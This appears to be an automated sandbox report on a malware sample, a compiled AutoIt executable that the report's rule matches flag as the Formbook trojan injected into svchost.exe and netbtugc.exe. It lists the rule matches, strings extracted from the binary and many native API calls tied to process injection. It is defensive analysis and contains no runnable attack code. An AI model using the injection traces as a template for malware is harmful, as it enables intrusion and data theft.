            Source: 2.2.svchost.exe.24d0000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4564773775.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.4581093569.00000000055C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4574527555.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2270118769.0000000002E80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2269837439.00000000024D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4574542638.0000000002F30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4575593241.0000000002C30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2270555889.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: QLLafoDdqv.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
            Source: QLLafoDdqv.exe, 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script.memstr_868e7265-0
            Source: QLLafoDdqv.exe, 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_0efbf333-e
            Source: QLLafoDdqv.exe | String found in binary or memory: This is a third-party compiled AutoIt script.memstr_91e74eef-6
            Source: QLLafoDdqv.exe | String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_2245d438-2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_024FB363 NtClose
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_024D1D09 NtProtectVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F72B60 NtClose,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F72C70 NtFreeVirtualMemory,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F72DF0 NtQuerySystemInformation,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F735C0 NtCreateMutant,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F74340 NtSetContextThread
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F74650 NtSuspendThread
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F72AF0 NtWriteFile
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F72AD0 NtReadFile
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F72AB0 NtWaitForSingleObject
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F72BF0 NtAllocateVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F72BE0 NtQueryValueKey
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F72BA0 NtEnumerateValueKey
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F72B80 NtQueryInformationFile
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F72EE0 NtQueueApcThread
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F72EA0 NtAdjustPrivilegesToken
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F72E80 NtReadVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F72E30 NtWriteVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F72FE0 NtCreateFile
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F72FB0 NtResumeThread
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F72FA0 NtQuerySection
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F72F90 NtProtectVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F72F60 NtCreateProcessEx
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F72F30 NtCreateSection
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F72CF0 NtOpenProcess
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F72CC0 NtQueryVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F72CA0 NtQueryInformationToken
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F72C60 NtCreateKey
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F72C00 NtQueryInformationProcess
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F72DD0 NtDelayExecution
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F72DB0 NtEnumerateKey
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F72D30 NtUnmapViewOfSection
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F72D10 NtMapViewOfSection
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F72D00 NtSetInformationFile
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F73090 NtSetValueKey
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F73010 NtOpenDirectoryObject
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F739B0 NtGetContextThread
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F73D70 NtOpenThread
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F73D10 NtOpenProcessToken
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03174340 NtSetContextThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03174650 NtSuspendThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03172B60 NtClose,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03172BA0 NtEnumerateValueKey,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03172BF0 NtAllocateVirtualMemory,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03172BE0 NtQueryValueKey,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03172AD0 NtReadFile,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03172AF0 NtWriteFile,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03172F30 NtCreateSection,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03172FB0 NtResumeThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03172FE0 NtCreateFile,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03172E80 NtReadVirtualMemory,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03172EE0 NtQueueApcThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03172D10 NtMapViewOfSection,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03172D30 NtUnmapViewOfSection,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03172DD0 NtDelayExecution,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03172DF0 NtQuerySystemInformation,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03172C70 NtFreeVirtualMemory,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03172C60 NtCreateKey,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03172CA0 NtQueryInformationToken,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_031735C0 NtCreateMutant,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_031739B0 NtGetContextThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03172B80 NtQueryInformationFile
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03172AB0 NtWaitForSingleObject
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03172F60 NtCreateProcessEx
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03172F90 NtProtectVirtualMemory
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03172FA0 NtQuerySection
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03172E30 NtWriteVirtualMemory
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03172EA0 NtAdjustPrivilegesToken
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03172D00 NtSetInformationFile
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03172DB0 NtEnumerateKey
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03172C00 NtQueryInformationProcess
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03172CC0 NtQueryVirtualMemory
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03172CF0 NtOpenProcess
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03173010 NtOpenDirectoryObject
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03173090 NtSetValueKey
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03173D10 NtOpenProcessToken
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_03173D70 NtOpenThread
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02557A70 NtReadFile
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02557B50 NtDeleteFile
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02557BE0 NtClose
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02557920 NtCreateFile
            Source: C:\Windows\SysWOW64\netbtugc.exe | Code function: 4_2_02557D30 NtAllocateVirtualMemory
            Source: C:\Users\user\Desktop\QLLafoDdqv.exe | Code function: 0_2_0073D5EB: CreateFileW,DeviceIoControl,CloseHandle
            Source: C:\Users\user\Desktop\QLLafoDdqv.exe | Code function: 0_2_00731201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
            Source: C:\Users\user\Desktop\QLLafoDdqv.exe | Code function: 0_2_0073E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
            Source: C:\Users\user\Desktop\QLLafoDdqv.exe | Code function: 0_2_006DBF40
            Source: C:\Users\user\Desktop\QLLafoDdqv.exe | Code function: 0_2_006D8060
            Source: C:\Users\user\Desktop\QLLafoDdqv.exe | Code function: 0_2_00742046
            Source: C:\Users\user\Desktop\QLLafoDdqv.exe | Code function: 0_2_00738298
            Source: C:\Users\user\Desktop\QLLafoDdqv.exe | Code function: 0_2_0070E4FF
            Source: C:\Users\user\Desktop\QLLafoDdqv.exe | Code function: 0_2_0070676B
            Source: C:\Users\user\Desktop\QLLafoDdqv.exe | Code function: 0_2_00764873
            Source: C:\Users\user\Desktop\QLLafoDdqv.exe | Code function: 0_2_006DCAF0
            Source: C:\Users\user\Desktop\QLLafoDdqv.exe | Code function: 0_2_006FCAA0
            Source: C:\Users\user\Desktop\QLLafoDdqv.exe | Code function: 0_2_006ECC39
            Source: C:\Users\user\Desktop\QLLafoDdqv.exe | Code function: 0_2_00706DD9
            Source: C:\Users\user\Desktop\QLLafoDdqv.exe | Code function: 0_2_006EB119
            Source: C:\Users\user\Desktop\QLLafoDdqv.exe | Code function: 0_2_006D91C0
            Source: C:\Users\user\Desktop\QLLafoDdqv.exe | Code function: 0_2_006F1394
            Source: C:\Users\user\Desktop\QLLafoDdqv.exe | Code function: 0_2_006F781B
            Source: C:\Users\user\Desktop\QLLafoDdqv.exe | Code function: 0_2_006E997D
            Source: C:\Users\user\Desktop\QLLafoDdqv.exe | Code function: 0_2_006D7920
            Source: C:\Users\user\Desktop\QLLafoDdqv.exe | Code function: 0_2_006F7A4A
            Source: C:\Users\user\Desktop\QLLafoDdqv.exe | Code function: 0_2_006F7CA7
            Source: C:\Users\user\Desktop\QLLafoDdqv.exe | Code function: 0_2_0075BE44
            Source: C:\Users\user\Desktop\QLLafoDdqv.exe | Code function: 0_2_00709EEE
            Source: C:\Users\user\Desktop\QLLafoDdqv.exe | Code function: 0_2_015C3620
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_024D1290
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_024E6873
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_024E6871
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_024D28A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_024E0173
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_024D1110
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_024DE1F3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_024D268A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_024D2698
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_024D26A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_024DFF4A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_024FD753
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_024DFF53
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_024D3500
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FC02C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FE0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030003E6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F4E3F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FFA352
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030001AA
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FF81CC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FC8158
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FDA118
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F30100
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F5C6E0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F3C7C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F64750
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FEE4F6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03000591
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FF2446
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FE4420
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F40535
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F3EA80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FF6BD7
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FFAB40
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F6E8F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F268B8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0300A9A6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F4A840
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F42840
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F56962
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FFEEDB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F52E90
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FFCE93
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F40E59
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FFEE26
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F4CFE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F32FC8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FBEFA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FB4F40
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F60F30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FE2F30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F82F28
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F30CF2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FE0CB5
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F40C00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F3ADE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F58DBF
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FDCD1F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F4AD00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FE12ED
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F5B2C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F452A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F8739A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F2D34C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FF132D
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FF70E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FFF0E0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FEF0CC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F470C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0300B16B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F4B1B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F2F172
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F7516C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FF16CC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FFF7B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F31460
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FFF43F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FDD5B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FF7571
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FEDAC6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FDDAAC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F85AA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FE1AA3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FB3A6C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FFFA49
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FF7A46
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FB5BF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F7DBF9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F5FB80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FFFB76
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F438E0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FAD800
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F49950
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F5B950
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FD5910
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F49EB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FFFFB1
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F41F92
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FFFF09
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FFFCF2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FB9C32
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F5FDC0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FF7D73
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02FF1D5A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_02F43D40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031FA3524_2_031FA352
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_032003E64_2_032003E6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0314E3F04_2_0314E3F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031E02744_2_031E0274
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031C02C04_2_031C02C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031DA1184_2_031DA118
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031301004_2_03130100
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031C81584_2_031C8158
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_032001AA4_2_032001AA
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031F41A24_2_031F41A2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031F81CC4_2_031F81CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031D20004_2_031D2000
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031647504_2_03164750
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031407704_2_03140770
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0313C7C04_2_0313C7C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0315C6E04_2_0315C6E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031405354_2_03140535
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_032005914_2_03200591
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031E44204_2_031E4420
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031F24464_2_031F2446
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031EE4F64_2_031EE4F6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031FAB404_2_031FAB40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031F6BD74_2_031F6BD7
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0313EA804_2_0313EA80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031569624_2_03156962
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0320A9A64_2_0320A9A6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031429A04_2_031429A0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0314A8404_2_0314A840
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031428404_2_03142840
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_031268B84_2_031268B8
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0316E8F04_2_0316E8F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03160F304_2_03160F30
